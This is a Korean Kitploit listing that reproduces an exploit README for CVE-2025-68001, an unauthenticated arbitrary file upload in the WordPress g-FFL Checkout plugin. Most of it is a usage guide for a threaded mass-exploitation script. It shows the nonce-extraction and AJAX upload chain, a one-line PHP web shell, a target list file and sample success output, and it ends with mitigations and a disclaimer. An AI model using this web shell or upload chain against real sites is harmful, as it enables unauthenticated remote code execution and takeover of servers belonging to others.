Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-68001 — WordPress g-FFL Checkout Plugin <= 2.1.0은 높은 우선순위의 임의 파일 업로드에 취약합니다. | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-68001
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubnxploited/cve-2025-68001

CVE-2025-68001

WordPress g-FFL Checkout Plugin <= 2.1.0은 높은 우선순위의 임의 파일 업로드에 취약합니다.

저장소 보기
14개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-68001

WordPress g-FFL 체크아웃 플러그인 <= 2.1.0에서 발생하는 높은 우선순위의 임의 파일 업로드 취약점

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 항상 앞서 나가세요. Telegram에서 @KNxploited 에 가입하세요 — 최신 CVE, 제로데이 및 최첨단 익스플로잇 연구를 위한 독점 소스입니다. 지속적으로 업데이트됩니다. 모두를 위한 것은 아닙니다.


📋 개요

은 의 WordPress 플러그인에서 발견된 치명적인 취약점입니다.

CVE-2025-68001
garidium
g-FFL 체크아웃
인증되지 않은 임의 파일 업로드

이 취약점을 통해 인증되지 않은 원격 공격자는 ffl_upload_document AJAX 액션을 통해 웹 셸을 포함한 임의의 파일을 대상 서버에 업로드하여 전체 원격 코드 실행(RCE) 에 도달할 수 있습니다.

필드세부 정보
CVE IDCVE-2025-68001
플러그인g-FFL 체크아웃 (g-ffl-checkout)
영향 받는 버전n/a 부터 <= 2.1.0까지
취약점 유형제한 없는 파일 업로드
영향원격 코드 실행(RCE)
인증필요 없음
CVSS 심각도치명적
연구자Nxploited

⚙️ 작동 방식

이 익스플로잇은 정확한 다단계 공격 체인을 따릅니다:

root@kitploit:~
1. GET /checkout
      ↓
   인라인 JavaScript 데이터에서 `checkout_nonce` 추출

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<추출된_nonce>
      document_type=document
      document=<image/png로 위장한 shell.php>
      ↓
   서버가 확장자 또는 MIME 검증 없이 파일 저장

3. JSON 응답 파싱
      ↓
   업로드된 파일 경로 / 고유 파일명 추출

4. HTTP를 통해 업로드된 셸에 접근
      ↓
   원격 코드 실행 성공 ✔️

이 플러그인은 AJAX 엔드포인트 ffl_upload_document를 노출하며, 이는 다음을 수행합니다:

  • 인증 확인 없이 파일 업로드 수락
  • 서버 측 파일 유형 검증을 수행하지 않음
  • JSON 응답에 저장된 파일 경로 반환

🔧 요구 사항

실행 전 모든 종속성을 설치하세요:

root@kitploit:~
pip install requests rich
종속성목적
requestsHTTP 요청 및 세션 처리
rich터미널 UI, 진행 표시줄, 패널
threading멀티스레드 대상 처리

Python 3.8+ 이 필요합니다.


📂 파일 구조

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # 메인 익스플로잇 스크립트
├── shell.php               # 업로드할 웹 셸 (직접 제공)
├── list.txt                # 대상 URL (한 줄에 하나씩)
└── success_results.txt     # 자동 생성된 결과 출력

🚀 사용법

1단계 — 대상 준비

한 줄에 하나의 대상 URL로 list.txt 파일을 만드세요:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

스크립트는 스키마가 제공되지 않은 경우 자동으로 http://를 앞에 추가합니다.


2단계 — 셸 준비

PHP 웹 셸을 동일한 디렉토리에 배치하세요. 최소 셸 예시:

root@kitploit:~
<?php system($_GET['cmd']); ?>

shell.php로 저장하세요 (또는 다른 이름 — 입력하라는 메시지가 표시됩니다).


3단계 — 익스플로잇 실행

root@kitploit:~
python CVE-2025-68001.py

대화형으로 메시지가 표시됩니다:

root@kitploit:~
대상 파일 이름 입력 (기본값: list.txt):
> list.txt

업로드할 셸 파일 이름 입력 (기본값: shell.php):
> shell.php

스레드 수 입력 (기본값: 50):
> 20

4단계 — 결과 확인

성공적인 익스플로잇은 success_results.txt에 자동으로 저장됩니다:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

각 줄에는 다음이 포함됩니다:

  • 대상 URL
  • 서버에 저장된 파일 경로
  • 서버가 할당한 고유 파일명
  • 원래 업로드된 파일명

🖥️ 스크립트 매개변수 참조

프롬프트기본값설명
대상 파일list.txt대상 URL이 포함된 파일
셸 파일shell.php대상에 업로드할 PHP 셸
스레드 수50동시 작업자 (최대: 50)

📊 출력 예시

root@kitploit:~
✔  https://victim.com  — /checkout 도달 가능. 익스플로잇 시도 중...

┌─────────────────────────────────────────────────────┐
│                      성공                        │
│  https://victim.com                                 │
│  원래 이름:  shell.php                          │
│  고유 이름:    a7f3c1d9e.php                      │
│  저장 경로:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

모든 대상 처리 완료 ✔️. 결과 저장 위치: success_results.txt

🔍 취약한 코드 경로 (기술적)

취약점은 권한 확인 없이 등록된 플러그인의 AJAX 핸들러에 있습니다:

root@kitploit:~
// 인증 또는 권한 확인 없음
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // /checkout 페이지에서 논스 확인 (공개적으로 접근 가능)
    // MIME 유형 검증 없음
    // 확장자 화이트리스트/블랙리스트 없음
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ 완화 및 수정

사이트 소유자 또는 개발자인 경우 다음 단계를 즉시 수행하세요:

  • ✅ 업데이트 g-ffl-checkout 플러그인을 패치된 버전(> 2.1.0)으로 (가능한 경우)
  • ✅ 비활성화 패치가 확인될 때까지 플러그인 비활성화
  • ✅ 제한 업로드 디렉토리의 실행 권한 제한 (예: .htaccess 규칙)
  • ✅ 구현 서버 측 파일 유형 검증 및 엄격한 확장자 화이트리스트 적용
  • ✅ 모니터링 업로드 디렉토리에서 의심스러운 .php 파일 모니터링
  • ✅ WAF 활성화 인증되지 않은 AJAX 파일 업로드 요청을 차단하는 WAF 규칙 활성화

⚠️ 면책 조항

root@kitploit:~
이 도구는 교육 및 허가된 보안 연구 목적으로만 엄격히 제공됩니다.

이 스크립트를 사용함으로써 귀하는 다음에 명시적으로 동의합니다:

  • 대상 시스템 소유자로부터 명시적인 서면 허가를 받았습니다.
  • 통제된 연구실 또는 허가된 침투 테스트 환경에서 운영 중입니다.
  • 귀하가 소유하지 않았거나 법적 테스트 권한이 없는 시스템에 대해
    이 도구를 사용하지 않을 것입니다.
  • 저자(Nxploited)는 이 도구로 인한 손해, 데이터 손실, 법적 결과
    또는 오용에 대해 어떠한 책임도 지지 않습니다.

허가 없이 이 도구를 시스템에 무단 사용하는 것은 불법이며
다음을 포함하되 이에 국한되지 않는 법률을 위반할 수 있습니다:
  — 컴퓨터 사기 및 남용법(CFAA)
  — 정보 시스템에 대한 공격에 관한 EU 지침
  — 및 해당 관할권의 동등한 법률.

책임감 있게 사용하세요. 윤리적으로 해킹하세요.

👤 저자

핸들Nxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Telegram에서 @KNxploited를 팔로우하세요 최신 취약점 공개, 익스플로잇 릴리스 및 보안 연구를 다른 누구보다 먼저 받아보세요.


정밀하게 구축됨 by Nxploited · 교육 목적으로만 사용
도구 다운로드